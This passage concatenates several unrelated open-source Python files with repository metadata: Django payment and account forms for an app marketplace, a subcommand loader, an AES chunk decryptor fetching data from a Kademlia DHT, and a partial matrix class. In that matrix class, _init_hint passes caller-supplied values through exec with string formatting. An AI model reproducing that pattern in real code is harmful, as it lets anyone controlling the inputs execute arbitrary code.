PAYMENT_METHOD_OPERATOR)
from mkt.developers.models import AddonPaymentAccount, PaymentAccount
from mkt.prices.models import AddonPremium, Price
from mkt.reviewers.models import RereviewQueue
from mkt.site.forms import AddonChoiceField
from mkt.submit.forms import DeviceTypeForm
from mkt.webapps.models import AddonUpsell, Webapp
log = commonware.log.getLogger('z.devhub')
def _restore_app_status(app, save=True):
"""
Restore an incomplete app to its former status. The app will be marked
as its previous status or PENDING if it was never reviewed.
"""
log.info('Changing app from incomplete to previous status: %d' % app.pk)
app.status = (app.highest_status if
app.highest_status != mkt.STATUS_NULL else
mkt.STATUS_PENDING)
if save:
app.save()
class PremiumForm(DeviceTypeForm, happyforms.Form):
"""
The premium details for an addon, which is unfortunately
distributed across a few models.
"""
# This does a nice Yes/No field like the mockup calls for.
allow_inapp = forms.ChoiceField(
choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))),
widget=forms.RadioSelect, required=False)
# Choices are provided at init by group_tier_choices.
price = forms.ChoiceField(choices=(), label=_lazy(u'App Price'),
required=False)
def __init__(self, *args, **kw):
self.request = kw.pop('request')
self.addon = kw.pop('addon')
self.user = kw.pop('user')
kw['initial'] = {
'allow_inapp': self.addon.premium_type in mkt.ADDON_INAPPS
}
if self.addon.premium_type == mkt.ADDON_FREE_INAPP:
kw['initial']['price'] = 'free'
elif self.addon.premium and self.addon.premium.price:
# If the app has a premium object, set the initial price.
kw['initial']['price'] = self.addon.premium.price.pk
super(PremiumForm, self).__init__(*args, **kw)
self.fields['paid_platforms'].choices = PAID_PLATFORMS(self.request)
self.fields['free_platforms'].choices = FREE_PLATFORMS()
if (self.is_paid() and not self.is_toggling()):
# Require the price field if the app is premium and
# we're not toggling from free <-> paid.
self.fields['price'].required = True
# Get the list of supported devices and put them in the data.
self.device_data = {}
supported_devices = [mkt.REVERSE_DEVICE_LOOKUP[dev.id] for dev in
self.addon.device_types]
self.initial.setdefault('free_platforms', [])
self.initial.setdefault('paid_platforms', [])
for platform in set(x[0].split('-', 1)[1] for x in
(FREE_PLATFORMS() + PAID_PLATFORMS(self.request))):
supported = platform in supported_devices
self.device_data['free-%s' % platform] = supported
self.device_data['paid-%s' % platform] = supported
if supported:
self.initial['free_platforms'].append('free-%s' % platform)
self.initial['paid_platforms'].append('paid-%s' % platform)
if not self.initial.get('price'):
self.initial['price'] = self._initial_price_id()
self.fields['price'].choices = self.group_tier_choices()
def group_tier_choices(self):
"""Creates tier choices with optgroups based on payment methods"""
price_choices = [
('free', _('Free (with in-app payments)')),
]
card_billed = []
operator_billed = []
card_and_operator_billed = []
for price in Price.objects.active():
choice = (price.pk, unicode(price))
# Special case price tier 0.
if price.price == Decimal('0.00'):
price_choices.append((price.pk, '%s (%s)' %
(unicode(price),
_('Promotional Pricing'))))
# Tiers that can only be operator billed.
elif price.method == PAYMENT_METHOD_OPERATOR:
operator_billed.append(choice)
# Tiers that can only be card billed.
elif price.method == PAYMENT_METHOD_CARD:
card_billed.append(choice)
# Tiers that are can generally be billed by either
# operator or card.
elif price.method == PAYMENT_METHOD_ALL:
card_and_operator_billed.append(choice)
if operator_billed:
price_choices.append((_lazy('Only supports carrier billing'),
operator_billed))
if card_billed:
price_choices.append((_lazy('Only supports credit-card billing'),
card_billed))
if card_and_operator_billed:
price_choices.append(
(_lazy('Supports all billing methods'),
card_and_operator_billed))
return price_choices
def _initial_price_id(self):
"""Sets the inital price tier if available."""
try:
return Price.objects.active().get(price='0.99').id
except Price.DoesNotExist:
log.warning('Could not find a price tier 0.99 to set as default.')
return None
def _make_premium(self):
if self.addon.premium:
return self.addon.premium
log.info('New AddonPremium object for addon %s' % self.addon.pk)
self.addon._premium = AddonPremium(addon=self.addon,
price_id=self._initial_price_id())
return self.addon._premium
def is_paid(self):
is_paid = (self.addon.premium_type in mkt.ADDON_PREMIUMS or
self.is_free_inapp())
return is_paid
def is_free_inapp(self):
return self.addon.premium_type == mkt.ADDON_FREE_INAPP
def is_toggling(self):
value = self.request.POST.get('toggle-paid')
return value if value in ('free', 'paid') else False
def clean(self):
is_toggling = self.is_toggling()
if not is_toggling:
# If a platform wasn't selected, raise an error.
if not self.cleaned_data[
'%s_platforms' % ('paid' if self.is_paid() else 'free')]:
self._add_error('none')
# We want to throw out the user's selections in this case and
# not update the <select> element that goes along with this.
# I.e.: we don't want to re-populate these big chunky
# checkboxes with bad data.
# Also, I'm so, so sorry.
self.data = dict(self.data)
platforms = dict(
free_platforms=self.initial.get('free_platforms', []),
paid_platforms=self.initial.get('paid_platforms', []))
self.data.update(**platforms)
return self.cleaned_data
def clean_price(self):
price_value = self.cleaned_data.get('price')
premium_type = self.cleaned_data.get('premium_type')
if ((premium_type in mkt.ADDON_PREMIUMS or
premium_type == mkt.ADDON_FREE_INAPP) and
not price_value and not self.is_toggling()):
raise ValidationError(Field.default_error_messages['required'])
if not price_value and self.fields['price'].required is False:
return None
# Special case for a free app - in-app payments must be enabled.
# Note: this isn't enforced for tier zero apps.
if price_value == 'free':
if self.cleaned_data.get('allow_inapp') != 'True':
raise ValidationError(_('If app is Free, '
'in-app payments must be enabled'))
return price_value
try:
price = Price.objects.get(pk=price_value, active=True)
except (ValueError, Price.DoesNotExist):
raise ValidationError(_('Not a valid choice'))
return price
def save(self):
toggle = self.is_toggling()
upsell = self.addon.upsold
# is_paid is true for both premium apps and free apps with
# in-app payments.
is_paid = self.is_paid()
if toggle == 'paid' and self.addon.premium_type == mkt.ADDON_FREE:
# Toggle free apps to paid by giving them a premium object.
premium = self._make_premium()
premium.price_id = self._initial_price_id()
premium.save()
self.addon.premium_type = mkt.ADDON_PREMIUM
self.addon.status = mkt.STATUS_NULL
is_paid = True
elif toggle == 'free' and is_paid:
# If the app is paid and we're making it free, remove it as an
# upsell (if an upsell exists).
upsell = self.addon.upsold
if upsell:
log.debug('[1@%s] Removing upsell; switching to free' %
self.addon.pk)
upsell.delete()
log.debug('[1@%s] Removing app payment account' % self.addon.pk)
AddonPaymentAccount.objects.filter(addon=self.addon).delete()
log.debug('[1@%s] Setting app premium_type to FREE' %
self.addon.pk)
self.addon.premium_type = mkt.ADDON_FREE
# Remove addonpremium
try:
log.debug('[1@%s] Removing addon premium' % self.addon.pk)
self.addon.addonpremium.delete()
except AddonPremium.DoesNotExist:
pass
if (self.addon.has_incomplete_status() and
self.addon.is_fully_complete()):
_restore_app_status(self.addon, save=False)
is_paid = False
# Right is_paid is both paid apps and free with in-app payments.
elif is_paid:
price = self.cleaned_data.get('price')
# If price is free then we want to make this an app that's
# free with in-app payments.
if price == 'free':
self.addon.premium_type = mkt.ADDON_FREE_INAPP
log.debug('[1@%s] Changing to free with in_app'
% self.addon.pk)
# Remove upsell
upsell = self.addon.upsold
if upsell:
log.debug('[1@%s] Removing upsell; switching to free '
'with in_app' % self.addon.pk)
upsell.delete()
# Remove addonpremium
try:
log.debug('[1@%s] Removing addon premium' % self.addon.pk)
self.addon.addonpremium.delete()
except AddonPremium.DoesNotExist:
pass
else:
# The dev is submitting updates for payment data about a paid
# app. This might also happen if he/she is associating a new
# paid app with an existing bank account.
premium = self._make_premium()
self.addon.premium_type = (
mkt.ADDON_PREMIUM_INAPP if
self.cleaned_data.get('allow_inapp') == 'True' else
mkt.ADDON_PREMIUM)
if price and price != 'free':
log.debug('[1@%s] Updating app price (%s)' %
(self.addon.pk, self.cleaned_data['price']))
premium.price = self.cleaned_data['price']
premium.save()
if not toggle:
# Save the device compatibility information when we're not
# toggling.
super(PremiumForm, self).save(self.addon, is_paid)
log.info('Saving app payment changes for addon %s.' % self.addon.pk)
self.addon.save()
class UpsellForm(happyforms.Form):
upsell_of = AddonChoiceField(
queryset=Webapp.objects.none(), required=False,
label=_lazy(u'This is a paid upgrade of'),
empty_label=_lazy(u'Not an upgrade'))
def __init__(self, *args, **kw):
self.addon = kw.pop('addon')
self.user = kw.pop('user')
kw.setdefault('initial', {})
if self.addon.upsold:
kw['initial']['upsell_of'] = self.addon.upsold.free
super(UpsellForm, self).__init__(*args, **kw)
self.fields['upsell_of'].queryset = (
self.user.addons.exclude(pk=self.addon.pk,
status=mkt.STATUS_DELETED)
.filter(premium_type__in=mkt.ADDON_FREES))
def save(self):
current_upsell = self.addon.upsold
new_upsell_app = self.cleaned_data.get('upsell_of')
if new_upsell_app:
# We're changing the upsell or creating a new one.
if not current_upsell:
# If the upsell is new or we just deleted the old upsell,
# create a new upsell.
log.debug('[1@%s] Creating app upsell' % self.addon.pk)
current_upsell = AddonUpsell(premium=self.addon)
# Set the upsell object to point to the app that we're upselling.
current_upsell.free = new_upsell_app
current_upsell.save()
elif current_upsell:
# We're deleting the upsell.
log.debug('[1@%s] Deleting the app upsell' % self.addon.pk)
current_upsell.delete()
class BangoPaymentAccountForm(happyforms.Form):
bankAccountPayeeName = forms.CharField(
max_length=50, label=_lazy(u'Bank Account Holder Name'))
companyName = forms.CharField(
max_length=255, label=_lazy(u'Company Name'))
vendorName = forms.CharField(
max_length=255, label=_lazy(u'Vendor Name'))
financeEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Financial Email'),
max_length=100)
adminEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Administrative Email'),
max_length=100)
supportEmailAddress = forms.EmailField(
required=True, label=_lazy(u'Support Email'),
max_length=100)
address1 = forms.CharField(
max_length=255, label=_lazy(u'Address'))
address2 = forms.CharField(
max_length=255, required=False, label=_lazy(u'Address 2'))
addressCity = forms.CharField(
max_length=128, label=_lazy(u'City/Municipality'))
addressState = forms.CharField(
max_length=64, label=_lazy(u'State/Province/Region'))
addressZipCode = forms.CharField(
max_length=10, label=_lazy(u'Zip/Postal Code'))
addressPhone = forms.CharField(
max_length=20, label=_lazy(u'Phone'))
countryIso = forms.ChoiceField(
choices=BANGO_COUNTRIES, label=_lazy(u'Country'))
currencyIso = forms.ChoiceField(
choices=BANGO_OUTPAYMENT_CURRENCIES,
label=_lazy(u'I prefer to be paid in'))
vatNumber = forms.CharField(
max_length=17, required=False, label=_lazy(u'VAT Number'))
bankAccountNumber = forms.CharField(
max_length=20, label=_lazy(u'Bank Account Number'))
bankAccountCode = forms.CharField(
# l10n: SWIFT is http://bit.ly/15e7RJx and might not need translating.
max_length=20, label=_lazy(u'SWIFT code'))
bankName = forms.CharField(
max_length=50, label=_lazy(u'Bank Name'))
bankAddress1 = forms.CharField(
max_length=50, label=_lazy(u'Bank Address'))
bankAddress2 = forms.CharField(
max_length=50, required=False, label=_lazy(u'Bank Address 2'))
bankAddressCity = forms.CharField(
max_length=50, required=False, label=_lazy(u'Bank City/Municipality'))
bankAddressState = forms.CharField(
max_length=50, required=False,
label=_lazy(u'Bank State/Province/Region'))
bankAddressZipCode = forms.CharField(
max_length=10, label=_lazy(u'Bank Zip/Postal Code'))
bankAddressIso = forms.ChoiceField(
choices=BANGO_COUNTRIES, label=_lazy(u'Bank Country'))
account_name = forms.CharField(max_length=64, label=_lazy(u'Account Name'))
# These are the fields that Bango uses for bank details. They're read-only
# once written.
read_only_fields = set(['bankAccountPayeeName', 'bankAccountNumber',
'bankAccountCode', 'bankName', 'bankAddress1',
'bankAddressZipCode', 'bankAddressIso',
'adminEmailAddress', 'currencyIso',
'companyName'])
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(BangoPaymentAccountForm, self).__init__(*args, **kwargs)
if self.account:
# We don't need the bank account fields if we're getting
# modifications.
for field in self.fields:
if field in self.read_only_fields:
self.fields[field].required = False
def save(self):
# Save the account name, if it was updated.
self.account.get_provider().account_update(self.account,
self.cleaned_data)
class AccountListForm(happyforms.Form):
accounts = forms.ModelChoiceField(
queryset=PaymentAccount.objects.none(),
label=_lazy(u'Payment Account'), required=False)
def __init__(self, *args, **kwargs):
self.addon = kwargs.pop('addon')
self.provider = kwargs.pop('provider')
self.user = kwargs.pop('user')
super(AccountListForm, self).__init__(*args, **kwargs)
self.is_owner = None
if self.addon:
self.is_owner = self.addon.authors.filter(
pk=self.user.pk,
addonuser__role=mkt.AUTHOR_ROLE_OWNER).exists()
self.fields['accounts'].queryset = self.agreed_payment_accounts
if self.is_owner is False:
self.fields['accounts'].widget.attrs['disabled'] = ''
self.current_payment_account = None
try:
current_acct = AddonPaymentAccount.objects.get(
addon=self.addon,
payment_account__provider=self.provider.provider)
payment_account = PaymentAccount.objects.get(
uri=current_acct.account_uri)
# If this user owns this account then set initial otherwise
# we'll stash it on the form so we can display the non-owned
# current account separately.
if payment_account.user.pk == self.user.pk:
self.initial['accounts'] = payment_account
self.fields['accounts'].empty_label = None
else:
self.current_payment_account = payment_account
except (AddonPaymentAccount.DoesNotExist, PaymentAccount.DoesNotExist):
pass
@property
def payment_accounts(self):
queryset = (PaymentAccount.objects
.filter(inactive=False)
.filter(Q(user=self.user) | Q(shared=True))
.order_by('name', 'shared'))
if self.provider is not None:
queryset = queryset.filter(provider=self.provider.provider)
return queryset
@property
def agreed_payment_accounts(self):
return self.payment_accounts.filter(agreed_tos=True)
def has_accounts(self):
return self.payment_accounts.exists()
def has_completed_accounts(self):
return self.agreed_payment_accounts.exists()
def clean_accounts(self):
accounts = self.cleaned_data.get('accounts')
# When cleaned if the accounts field wasn't submitted or it's an empty
# string the cleaned value will be None for a ModelChoiceField.
# Therefore to tell the difference between the non-submission and the
# empty string we need to check the raw data.
accounts_submitted = 'accounts' in self.data
if (AddonPaymentAccount.objects.filter(addon=self.addon).exists() and
accounts_submitted and not accounts):
raise forms.ValidationError(
_('You cannot remove a payment account from an app.'))
if accounts and not self.is_owner:
raise forms.ValidationError(
_('You are not permitted to change payment accounts.'))
return accounts
def save(self):
if self.cleaned_data.get('accounts'):
try:
log.info('[1@%s] Attempting to delete app payment account'
% self.addon.pk)
AddonPaymentAccount.objects.get(
addon=self.addon,
payment_account__provider=self.provider.provider
).delete()
except AddonPaymentAccount.DoesNotExist:
log.info('[1@%s] Deleting failed, this is usually fine'
% self.addon.pk)
log.info('[1@%s] Creating new app payment account' % self.addon.pk)
account = self.cleaned_data['accounts']
uri = self.provider.product_create(account, self.addon)
AddonPaymentAccount.objects.create(
addon=self.addon, account_uri=account.uri,
payment_account=account, product_uri=uri)
# If the app is marked as paid and the information is complete
# and the app is currently marked as incomplete, put it into the
# re-review queue.
if (self.addon.status == mkt.STATUS_NULL and
self.addon.highest_status
in mkt.WEBAPPS_APPROVED_STATUSES):
# FIXME: This might cause noise in the future if bank accounts
# get manually closed by Bango and we mark apps as STATUS_NULL
# until a new account is selected. That will trigger a
# re-review.
log.info(u'[Webapp:%s] (Re-review) Public app, premium type '
u'upgraded.' % self.addon)
RereviewQueue.flag(
self.addon, mkt.LOG.REREVIEW_PREMIUM_TYPE_UPGRADE)
if (self.addon.has_incomplete_status() and
self.addon.is_fully_complete()):
_restore_app_status(self.addon)
class AccountListBaseFormSet(BaseFormSet):
"""Base FormSet for AccountListForm. Provide the extra data for the
AccountListForm as a list in `provider_data`.
Example:
formset = AccountListFormSet(provider_data=[
{'provider': Bango()}, {'provider': Boku()}])
"""
def __init__(self, **kwargs):
self.provider_data = kwargs.pop('provider_data', [])
super(AccountListBaseFormSet, self).__init__(**kwargs)
def _construct_form(self, i, **kwargs):
if i < len(self.provider_data):
_kwargs = self.provider_data[i]
else:
_kwargs = {}
_kwargs.update(kwargs)
return (super(AccountListBaseFormSet, self)
._construct_form(i, **_kwargs))
def save(self):
for form in self.forms:
form.save()
# Wrap the formset_factory call in a function so that extra/max_num works with
# different values of settings.PAYMENT_PROVIDERS in the tests.
def AccountListFormSet(*args, **kwargs):
provider_count = len(settings.PAYMENT_PROVIDERS)
current_form_set = formset_factory(AccountListForm,
formset=AccountListBaseFormSet,
extra=provider_count,
max_num=provider_count)
return current_form_set(*args, **kwargs)
class ReferenceAccountForm(happyforms.Form):
uuid = forms.CharField(max_length=36, required=False,
widget=forms.HiddenInput())
account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
name = forms.CharField(max_length=50, label=_lazy(u'Name'))
email = forms.EmailField(max_length=100, label=_lazy(u'Email'))
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(ReferenceAccountForm, self).__init__(*args, **kwargs)
def save(self):
# Save the account name, if it was updated.
provider = self.account.get_provider()
provider.account_update(self.account, self.cleaned_data)
class BokuAccountForm(happyforms.Form):
signup_url = settings.BOKU_SIGNUP_URL
account_name = forms.CharField(max_length=50, label=_lazy(u'Account name'))
# The lengths of these are not specified in the Boku documentation, so
# making a guess here about max lengths.
service_id = forms.CharField(max_length=50, label=_lazy(u'Service ID'))
def clean_service_id(self):
service_id = self.cleaned_data['service_id']
try:
client.api.boku.verify_service.post({'service_id': service_id})
except HttpClientError:
raise ValidationError(_('Service ID is not valid'))
else:
return service_id
class PaymentCheckForm(happyforms.Form):
app = SluggableModelChoiceField(
queryset=Webapp.objects.filter(
premium_type__in=mkt.ADDON_HAS_PAYMENTS),
sluggable_to_field_name='app_slug')
def clean_app(self):
app = self.cleaned_data['app']
if not app.has_payment_account():
raise ValidationError(_('No payment account set up for that app'))
return app
|
clouserw/zamboni
|
mkt/developers/forms_payments.py
|
Python
|
bsd-3-clause
| 26,284
|
from __future__ import unicode_literals, print_function, absolute_import
from giles.utils import load_subcommands
for name in ('giles', 'jira', 'github'):
load_subcommands('giles.commands.' + name)
|
anthonyalmarza/giles
|
giles/commands/__init__.py
|
Python
|
mit
| 203
|
# -*- coding: utf-8 -*-
from Crypto.Cipher import AES
from shaGeneration import *
from tools import *
import pickle
from os import remove
import pdb
#pdb.set_trace()
from twisted.internet import reactor, task
from twisted.python import log
from kademlia.network import Server
def grepChunks(result, i, j, server, splitedHashes, encrypedHashes, inputHash, chunkSize):
#pdb.set_trace()
# Write result from previous query
fn1 = encrypedHashes[i]
# TODO : Check if not none
if debug == 'normal': print ' Getting (i,j) > ' + str(i) + ', ' + str(j)
# Create new file if new chunk. Append otherwise.
if (j == 0):
fc = open(('scrambled/' + fn1), 'wb')
fc.write(result)
fc.close()
else:
fc = open(('scrambled/' + fn1), 'ab')
fc.write(result)
fc.close()
# Increment for next query
if( (len(splitedHashes[i])-1) != j ):
j += 1
else:
i += 1
j = 0
# Got all the chunks, return back to decryption scheme
if i == len(encrypedHashes) :
reactor.stop()
if debug != 'none': print ' Chunks downloaded from DHT!'
if debug != 'none': print ' Decrypting...'
maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=False)
return
# Get the next chunk
fn1 = splitedHashes[i][j]
server.get(fn1).addCallback(grepChunks, i, j, server, splitedHashes, encrypedHashes, inputHash, chunkSize)
def maidSafeDecryptSetDebug(inputHash, chunkSize, server, debu, grepNotDone=True, iterations=1000, xor=False):
global debug
debug = debu
if debug != 'none': print ' Downloading chunks from DHT...'
maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=True, iterations=1000, xor=False)
def maidSafeDecrypt(inputHash, chunkSize, server, grepNotDone=True, iterations=1000, xor=False):
# Getting back the objects:
with open(inputHash, 'rb') as f:
shas, encHashes, splitedHashes = pickle.load(f)
# Get filename
filename = inputHash.replace('.hashes', '')
# Erase file if already existing...
fc = open(('reconstructed/' + filename), 'w')
fc.write('')
fc.close()
noOfChunks = len(shas)
# Grep chunks if not done before. Return and let callback do the job
if (grepNotDone):
server.get(splitedHashes[0][0]).addCallback(grepChunks, 0, 0, server, splitedHashes, encHashes, inputHash, chunkSize)
return
# Resolve file from chunks
for i in range(0, noOfChunks):
# Get first item to decipher. First hash in the list and so on
fn1 = encHashes[i]
fc = open(('scrambled/' + fn1), 'rb')
scrambledData = fc.read()
fc.close()
remove('scrambled/' + fn1)
# Get data and create chunk #
chunkNumer = i
# Pick right hash...
if(chunkNumer == 0):
shaOne = shas[noOfChunks-1]
shaTwo = shas[noOfChunks-2]
shaThree = shas[chunkNumer]
elif(chunkNumer == 1):
shaOne = shas[noOfChunks-1]
shaTwo = shas[chunkNumer-1]
shaThree = shas[chunkNumer]
else:
shaOne = shas[chunkNumer-2]
shaTwo = shas[chunkNumer-1]
shaThree = shas[chunkNumer]
# Need massive key deriv to xor out of AES
if xor: keyDerivOut = keyDeriv(shaOne, shaTwo, shaThree, len(scrambledData.decode('hex')), iterations)
else : keyDerivOut = keyDeriv(shaOne, shaTwo, shaThree, 48, iterations)
# Unxor if needed
if xor: unXored = strxor(scrambledData,keyDerivOut.decode("hex"))
else: unXored = scrambledData
# Setup cipher with key = first half[:32] of pbkdf2, and IV = second part[:16]
cipher = AES.new(keyDerivOut[:64].decode('hex'), AES.MODE_CFB, keyDerivOut[64:(64+32)].decode('hex'))
# Encrypt
outCipher = (cipher.decrypt(unXored))
# Append decrypted data to file...
fc = open(('reconstructed/' + filename), 'ab')
fc.write(outCipher)
fc.close()
if debug == 'normal': print ' Chunk...'
if debug != 'none': print '\n File successfully downloaded ! It should be in reconstructed/'
|
pldubouilh/maidsafe
|
decrypt.py
|
Python
|
gpl-2.0
| 4,044
|
from __future__ import division
# -*- coding: utf-8 -*-
'''
Created on 18 Sep, 2014
PyMatrix implementation based on pure python oop charisma
Description:
@author : WANG LEI / YI, Research Associate @ NTU
@emial: L.WANG@ntu.edu.sg, Nanyang Technologcial University
@licence: licence
'''
__all__ = ["matrixArrayLists", "matrixArrayNum", "matrixArray"]
from time import time as Time
DEBUG_TIME_ELAPSE = False
# this function for elapse time measurement
# from core.framework.middleware import *
def timmer(func):
def wrapper(*args, **keywords):
# start time
start = Time()
# original call
result = func(*args, **keywords)
# end time
elapse = Time() - start
if DEBUG_TIME_ELAPSE:
print(func.__name__, ':\n\tconsumed ', '{0:<2.6f}'.format(elapse), ' seconds')
return result
return wrapper
# helper class for iteration over empty elements
class Null():
def __init__(self, *args, **hints):
pass
def __len__(self):
return 1
def __str__(self):
return '*'
def __repr__(self):
return 'nullObect'
def __add__(self, other):
return Null()
__radd__ = __add__
def __sub__(self, other):
return Null()
__rsub__ = __sub__
def __mul__(self, other):
return Null()
__rmul__ = __mul__
#===========================================================================
# n-d matrix size discriptor: when it is 2-d or 1-d, it reduces to {row, col} form
#===========================================================================
class Size(object):
def __init__(self, data=[]):
self.data = data
def __iter__(self):
return \
self.data.__iter__()
def __get__( self, caller, callerType,):
if caller == None:#caller == None:
return \
self.__get__(caller, callerType)
else:
return \
self.__class__( caller._get_shape_array() )
def __getitem__(self, key,):
try:
return self.data[key]
except:
return 0
def __setitem__(self, key, val):
self.data[key] = val
def __getattribute__(self, name,):
try:
return object.__getattribute__(self, name)
except:
if name in ['row', 'col']:
try:
return self.data[name]
except:
return self.data[{'row':0, 'col':1}[name]]
raise Exception("no such attribute")
def __len__(self):
if not self.data:
return 0
return \
len(self.data)
def __str__(self):
return str( len(self.data) ) + ':' + str(self.data) + '\n'
def count(self, item):
self.data.count(item)
return self.data
def append(self, item):
self.data.append(item)
return self.data
def assert_equal(self, size):
# do implementation here
return self, size, True
def assert_tolerate(self, size):
# do implementation here
return self, size, True
# for matrix values, we just have two types, numeric and non-numeric classes
#===========================================================================
# n-d matrix formatter discriptor
#===========================================================================
from math import floor
class Formatter(object):
def __init__(self, size=None, data = {'width':[2], 'float':2}, description= ['{0:<{width}.{float}f} ', '{0:<{width}s} ', '{0:<{width}s} ']):
self.templates = []
self.templates.extend(description)
self.data = data
self.size = size
def __get__(self, caller, callerType):
if caller == None:
return \
self
else:
return Formatter(caller.size, caller._init_formatter())
def __getitem__(self, _id):
return self.templates[_id]
def __getattribute__(self, name):
try:
return object.__getattribute__(self, name)
except:
if name == 'width':
# get stored position
a, b = self.position
width = self.data[name]
# get width for the element in column b
try:
return -self.float if a == self.size.row - 1 and b == self.size.col - 1 else width[b]# len(c), len(c[a])
except Exception as e:
print(e)
if name == 'float':
return self.data[name]
def register(self, template):
self.templates.append(template)
# used to decorate element
# format(element) -> new string
def fire(self, element, a, b):
# store the value
self.position = (a, b)
element = str(element)
# return processed string
try:
return self[0].format(element,
width=self.width + self.float,
float=self.float)
except ValueError:
return self[1].format(element.__str__(),
width=self.width + self.float)
except TypeError:
return self[2].format(element.__str__(),
width=self.width + self.float)
__call__ = fire
from copy import deepcopy
# helper function
def index_len(key, l):
if isinstance(key, int):
return (1,)
if isinstance(key, list):
return (len(key),)
if isinstance(key, slice):
start, stop, step = key.indices(l if isinstance(l, int)
else l[0])
return (len(range(start, stop, step)),)
# entrance
if isinstance(key, tuple):
l = deepcopy(l)
return tuple([index_len(i, l.pop(0) if len(l) > 0 else 0)[0] for i in key])
else:
return (1,)
# helper function
def index_val(key, l):
if isinstance(key, int):
return ([key],)
if isinstance(key, list):
return ( key ,)
if isinstance(key, slice):
start, stop, step = key.indices(l if isinstance(l, int)
else l[0])
return (list(range(start, stop, step)),)
# entrance
if isinstance(key, tuple):
l = deepcopy(l)
return tuple([index_val(i, l.pop(0) if len(l) > 0 else 0)[0] for i in key])
else:
return ([key], )
def edit(level, position, _list, Array):
if level == 0 and Array.x_label_enabled:
_list[level][position] = None
if level == 1 and Array.y_label_enabled:
pass#_list[level][position] = None
# this implementation has been deprecated,
# but later used to enhance core function ba
def index_map(func):
def wrpper(self, _id, l):
size = len(l)
list = []
for i in _id:
if i >= size:
break
list.append(i)
return func(self, list, l)
return wrpper
# this function might be changed in the future
# (1) if it found in column index,
# if key is of single value, replace it with '[:, map_kay(column_ref)]', and 'reference_name' -> headers
# (2) if it found in row index,
# if key is of single value, replace it with '[map_key(row_ref), :]', and 'row_ref' -> indice
# (3) store indice and headers in children selected
# keywords mapping
def map_key(func):
def wrpper(self, key):
size = self._get_shape_array()
# middleware preprocessing
hint = index_len(key, size)
# middleware preprocessing
key = index_val(key, size)
# get inner representation of the query object
root = self.get_runtime_list()
# ...
if self.R is False:
return func(self, key)
# do R like preprocessing
_list = [id for id in key]
headers = []; indice = []
for a, id in enumerate(_list[0:2]):
for b, idx in enumerate(id ):# id is not str
result, axis = \
self.isIndexHeader(idx)
if axis == 1: \
headers.append(idx)
if axis == 0: \
indice.append(idx)
if result is not None:
id[b] = result# legal
if axis is None:
edit(a,b,_list,self)
continue
_list[a] = list(filter(lambda x: x is not None,id))
# you have to do as what I show you.
child = func(self, tuple(_list))
# post processing:
try:
child.setIndice( indice)
child.setheader(headers)
except:
pass
return child
return wrpper
def loopprocess(func):
def wrapper(self):
r = self.r
c = self.c
if r is not None and c is not None:
return [r, c]
return func(self)
return wrapper
def checkKey(name, default, _dict):
try:
value = _dict[name]
except KeyError:
return default
return \
value
class matrixArrayLists(list):
'''
Created on 17 Nov, 2014
@author: wang yi/Lei, Researcher Associate @ EIRAN, Nanyang Technological University
@email: L.WANG@ntu.edu.sg
@copyright: 2014 www.yiak.co. All rights reserved.
@license: license
@decription: N-Matrix container for objects of any type. It then could be 2 or demensions numeric matrix for computation
@param:
'''
# discriptors initialzation
size = Size()
formatter = Formatter()
# options, configuration context
Init_hint_options = { 'r': None, 'c': None, 'debug' : False, 'modifed_to_row_col': False , 'ori_mem': None, 'R':False, 'row_indexList':[], 'col_indexList':[],
'Indice' : [], 'Headers': [],}
Init_matrix_options = { 'width' : 2, 'float' : 2,}
def __init__(self, *args, **hint):
# initialization fo hint data
# because repesentation in 2 demension, r(row), c(col) are needed. It should be modifed by descriptor which will compute r, c whenver an instance call it.
self._init_hint(hint)
numberOfargs = len(args)
# no inputting arguments
if numberOfargs == 0:
if hint == {}: pass
# no hints
elif hint != {}:
# set up empty matrix
# To do:
# initialization
super(matrixArrayLists, self).__init__([
])
elif numberOfargs == 1:
# create a square null matrix. 2-D version
if isinstance(args[0], int):
super(matrixArrayLists, self).__init__()
# specify n * n null matrix, done
self.nil(args[0], args[0], Null())
# create a matrix based on one inputting list
elif isinstance(args[0], list):
# copy or convert
super(matrixArrayLists, self).__init__()
# this works for matrix
self.setUp( args[0], self.r, self.c, self.ori_mem )
elif numberOfargs == 2:
# two integers are specified
if isinstance(args[0], int) and isinstance(args[1], int ):
super(matrixArrayLists, self).__init__()
# specify m * n null matrix
self.nil(args[0], args[1], Null())
# speed up techniques
self.r = args[0]
self.c = args[1]
# combination of integer and list inputtings
elif isinstance(args[0], int) and isinstance(args[1], list):
super(matrixArrayLists, self).__init__()
# To do: specify m * n null matrix
self.nil(args[0], args[0], Null())
self.setUp( args[1], args[0], self.c, self.ori_mem)
elif numberOfargs > 2:
for i in range( 0, len(args) ):
if not isinstance(args[i], int):
break
if i == 0 and isinstance(args[ 0 ], list):
# To do: matrix cantenation
super(matrixArrayLists, self).__init__()
# To do: union
if i != 0 and isinstance(args[ i ], list):
# To do: specify, filling missing data by other iteratables
super(matrixArrayLists, self).__init__()
self.nil_multi(*args[0:i])
# fillup
self.fillUp(*args[i:])
def _init_hint(self, hint):
for name, default in self.Init_hint_options.items():
# set local variables
exec("self.%s = %s" % (name, checkKey(name, default, hint)))
def _init_matrix_formatter(self, _float=2, _width=2, formatter=None):
for name, default in self.Init_matrix_options.items():
# set local variables
exec("self.%s = %s" % (name, default))
size = self.size
col_length = 0
width_list = []
inner_list = self.get_runtime_list()
if self.R is True:
inner_list.extend(self.Headers)
for j in range(size[1]):
col_length = self.width
for i in range(size[0]):
try:
element = inner_list[i][j]
except:
break
if isinstance(element, float):
element = floor(element)
if col_length < len(str(element)):
col_length = len(str(element))
# indice part
for i in range(len(self.Headers)):
try:
element = inner_list[i+size[0]][j]
except:
break
if isinstance(element, float):
element = floor(element)
if col_length < len(str(element)):
col_length = len(str(element))
width_list.append(col_length)
return {'float':_float, 'width':width_list}
def _init_array_formatter(self, indice=None, _float=0, _width=2):
col_length = _width
for j in range(len(indice)):
element = indice[j]
if isinstance(element, float):
element = floor(element)
if col_length < len(str(element)):
col_length = len(str(element))
return {'float': _float, 'width':[col_length]}
init_array_formatter = _init_array_formatter
# interface function
def _init_formatter(self, _float=2, _width=2, formatter=None):
